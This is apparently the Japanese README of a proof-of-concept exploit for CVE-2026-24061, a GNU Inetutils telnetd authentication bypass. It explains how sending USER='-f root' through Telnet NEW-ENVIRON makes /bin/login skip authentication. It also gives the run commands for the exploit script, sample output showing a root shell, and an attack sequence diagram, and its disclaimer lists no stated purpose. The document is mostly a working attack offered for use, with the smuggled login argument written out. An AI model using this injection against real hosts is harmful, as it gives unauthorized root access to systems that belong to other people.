
GNU Inetutils telnetd 認証バイパス(CVE-2026-24061)の概念実証エクスプロイト。細工した NEW-ENVIRON USER 変数を介して root シェルを起動します。
これにより認証がバイパスされ、即座に root シェル が起動します。
Telnet NEW‑ENVIRON により、クライアントはセッションネゴシエーション中に環境変数を設定できます。
脆弱な telnetd は USER を login に直接渡します:
/bin/login -f "$USER"
攻撃者は以下を設定します:
USER=-f root
結果:
/bin/login -f root
-f フラグは login に 認証をスキップ するよう指示し、root アクセスを許可します。
外部依存関係は不要です。
python3 cve-2026-24061.py 192.168.1.100
python3 cve-2026-24061.py example.com 23
脆弱な場合:
# id
uid=0(root) gid=0(root)
#
対話型の root シェルが取得できます。
python3 cve-2026-24061.py 10.10.10.20
出力:
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
sequenceDiagram
participant A as Attacker
participant T as Target telnetd
participant L as /bin/login
participant R as Root Shell
A->>T: Connect TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Execute /bin/login -f root
L-->>T: Auth bypass success
T-->>R: Spawn root shell
R-->>A: Interactive root session
このエクスプロイトは以下を目的として提供されています:
所有していない、またはテスト許可を得ていないシステムに対する不正使用は違法です。